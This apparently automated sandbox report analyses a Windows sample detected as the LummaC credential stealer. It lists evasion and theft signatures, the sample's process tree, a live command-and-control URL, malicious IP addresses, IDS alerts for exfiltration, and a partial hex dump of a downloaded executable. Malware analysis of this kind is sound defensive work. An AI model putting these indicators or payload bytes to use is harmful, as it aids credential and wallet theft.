Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561528
MD5:15a0533dbbd05872ade7db7af70e20f0
SHA1:9aa7aebb7472f67f2c9ddc9bef2fbe3e0ebcabdf
SHA256:77759718bf4686d4cd5d44f739f1ef98dd7389dec31dbe3f7f03f3ad09729ec9
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 4280 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 15A0533DBBD05872ADE7DB7AF70E20F0)
    • chrome.exe (PID: 1068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1992,i,4390689463259841264,4189081711849451839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,11718227575472931439,6391638913668732061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1793640504.0000000000E41000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1792814886.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1794021961.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1792784411.0000000000E40000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1792640692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 10 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T16:53:04.718283+010020283713Unknown Traffic192.168.2.449730172.67.162.84443TCP
              2024-11-23T16:53:06.872986+010020283713Unknown Traffic192.168.2.449731172.67.162.84443TCP
              2024-11-23T16:53:09.717644+010020283713Unknown Traffic192.168.2.449732172.67.162.84443TCP
              2024-11-23T16:53:12.201167+010020283713Unknown Traffic192.168.2.449733172.67.162.84443TCP
              2024-11-23T16:53:14.732904+010020283713Unknown Traffic192.168.2.449734172.67.162.84443TCP
              2024-11-23T16:53:17.244324+010020283713Unknown Traffic192.168.2.449735172.67.162.84443TCP
              2024-11-23T16:53:19.660969+010020283713Unknown Traffic192.168.2.449737172.67.162.84443TCP
              2024-11-23T16:53:26.015972+010020283713Unknown Traffic192.168.2.449742172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T16:53:05.401769+010020546531A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
              2024-11-23T16:53:07.601410+010020546531A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
              2024-11-23T16:53:26.634848+010020546531A Network Trojan was detected192.168.2.449742172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T16:53:05.401769+010020498361A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T16:53:07.601410+010020498121A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T16:53:28.208865+010020197142Potentially Bad Traffic192.168.2.449744185.215.113.1680TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T16:53:13.063664+010020480941Malware Command and Control Activity Detected192.168.2.449733172.67.162.84443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: file.exe.4280.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
              Source: file.exeReversingLabs: Detection: 47%
              Source: file.exeJoe Sandbox ML: detected
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.204.130.19:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.204.130.19:443 -> 192.168.2.4:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49818 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 172.67.162.84:443
              Source: Malware configuration extractorURLs: https://property-imper.sbs/api
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 15:53:27 GMTContent-Type: application/octet-streamContent-Length: 2803712Last-Modified: Sat, 23 Nov 2024 15:27:00 GMTConnection: keep-aliveETag: "6741f444-2ac800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 b2 59 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 62 71 69 73 6f 63 72 00 80 2a 00 00 a0 00 00 00 68 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 6b 62 6d 78 62 6b 67 00 20 00 00 00 20 2b 00 00 04 00 00 00 a2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 a6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
              Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49744 -> 185.215.113.16:80
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 84.201.211.39
              Source: unknownTCP traffic detected without corresponding DNS query: 84.201.211.39
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=t+fsTBSdmLwTfcf&MD=sOX2zuT8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=t+fsTBSdmLwTfcf&MD=sOX2zuT8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
